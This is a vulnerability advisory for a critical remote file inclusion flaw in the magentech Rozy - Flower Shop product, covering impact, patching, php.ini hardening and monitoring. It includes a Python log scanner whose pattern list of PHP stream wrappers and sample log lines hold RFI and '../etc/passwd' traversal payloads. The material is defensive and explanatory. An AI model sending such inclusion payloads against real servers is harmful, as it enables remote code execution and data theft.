CVE-2025-12549

magentech · magentech Rozy - Flower Shop

A critical vulnerability has been identified in the magentech Rozy - Flower Shop product, which could allow an unauthenticated remote attacker to execute arbitrary code on the server.

Executive summary

A critical vulnerability has been identified in the magentech Rozy - Flower Shop product, which could allow an unauthenticated remote attacker to execute arbitrary code on the server. Successful exploitation of this vulnerability would lead to a complete compromise of the affected system, enabling an attacker to steal sensitive data, disrupt services, or use the server for further malicious activities. Due to the critical severity and ease of exploitation, immediate remediation is strongly recommended.

Vulnerability

The vulnerability is an Improper Control of a Filename for an Include/Require Statement, commonly known as Remote File Inclusion (RFI). The application fails to properly sanitize user-supplied input that is later used in a PHP include or require statement. An unauthenticated remote attacker can exploit this by crafting a request that points to a malicious PHP file hosted on an external server. The vulnerable application will then fetch, include, and execute this remote file, giving the attacker full control over the web server with the privileges of the web service account.

Business impact

This vulnerability is rated as critical severity with a CVSS score of 9.8. A successful exploit would result in a complete compromise of the confidentiality, integrity, and availability of the affected server. Potential consequences include the theft of sensitive customer data, payment card information, and intellectual property. An attacker could also deface the website, install ransomware, or use the compromised server as a pivot point to attack other systems within the internal network, leading to significant financial loss, operational disruption, and severe reputational damage.

Remediation

Immediate Action: Immediately update the magentech Rozy - Flower Shop product to the latest version available from the vendor, which should be a version higher than 1.2.25. After patching, it is crucial to monitor for any signs of ongoing or previous exploitation attempts by thoroughly reviewing web server access logs and system logs for suspicious activity.

Proactive Monitoring: Review web server access logs for requests containing external URLs or unusual file path traversals (../) in request parameters. Monitor for unexpected outbound network connections from the web server, as this can be an indicator of a successful RFI exploit where the server is connecting to an attacker-controlled machine. Implement file integrity monitoring to detect unauthorized changes to web application files.
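As an added example (not part of the advisory or the vendor's code), the following Python script implements the log review described above: it parses Apache/nginx combined-format access-log lines, decodes each query parameter (including a second decoding pass for double-URL-encoded values), and flags parameters that carry an external URL, a PHP stream wrapper, a `../` traversal or a null byte. The log lines, parameter name and IP addresses are constructed placeholders, not data from the page.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" format: client, timestamp, request line, status, bytes, referer, user-agent
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Schemes and stream wrappers that turn a PHP include/require into a remote or attacker-controlled load
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:", "expect://", "phar://")

def suspicious_params(target):
    """Return (param, decoded_value, reason) for each query parameter that looks like an RFI/LFI attempt."""
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(raw).strip()  # parse_qsl decoded once; this undoes double encoding
        low = value.lower()
        if low.startswith(REMOTE_SCHEMES):
            findings.append((name, value, "remote-url-or-wrapper"))
        elif "../" in low or "..\\" in low:
            findings.append((name, value, "path-traversal"))
        elif "\x00" in value:
            findings.append((name, value, "null-byte"))
    return findings

def scan_log(lines):
    """Scan raw access-log lines and return one alert dict per request with suspicious parameters."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; in production count these rather than dropping them silently
        hits = suspicious_params(m["target"])
        if hits:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "path": urlsplit(m["target"]).path,
                           "status": int(m["status"]), "hits": hits})
    return alerts

# Constructed sample lines (not real traffic); "page" is a placeholder parameter name.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Jan/2025:12:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Jan/2025:12:00:02 +0000] "GET /index.php?page=http://198.51.100.7/remote.txt HTTP/1.1" 200 233 "-" "curl/8.0"
198.51.100.23 - - [10/Jan/2025:12:00:03 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 500 0 "-" "python-requests/2.31"
203.0.113.10 - - [10/Jan/2025:12:00:04 +0000] "GET /index.php?page=%2568ttp://198.51.100.7/x HTTP/1.1" 200 233 "-" "curl/8.0"
"""

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG.splitlines()):
        print(alert["ts"], alert["ip"], alert["path"], alert["hits"])
```

A hit on a request that returned HTTP 200 (rather than 4xx/5xx) is the case to escalate first, since it suggests the include succeeded; correlate it with the outbound-connection monitoring described above.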

Compensating Controls: If immediate patching is not feasible, implement the following controls to mitigate risk:

  • Deploy a Web Application Firewall (WAF) with rules specifically designed to detect and block file inclusion attack patterns.
  • In the server's php.ini configuration file, disable allow_url_include and allow_url_fopen to prevent PHP from including remote files.
  • Restrict outbound network traffic from the web server to only known and trusted destinations.

Exploitation status

Public Exploit Available: false

Analyst recommendation

Given the critical CVSS score of 9.8 and the potential for complete system compromise, this vulnerability poses an immediate and severe risk to the organization. We strongly recommend that all instances of the affected magentech Rozy - Flower Shop product be patched immediately. Although this CVE is not currently listed on the CISA KEV catalog, its high severity and ease of exploitation make it a prime target for threat actors. Prioritize this patching activity above all other non-critical updates.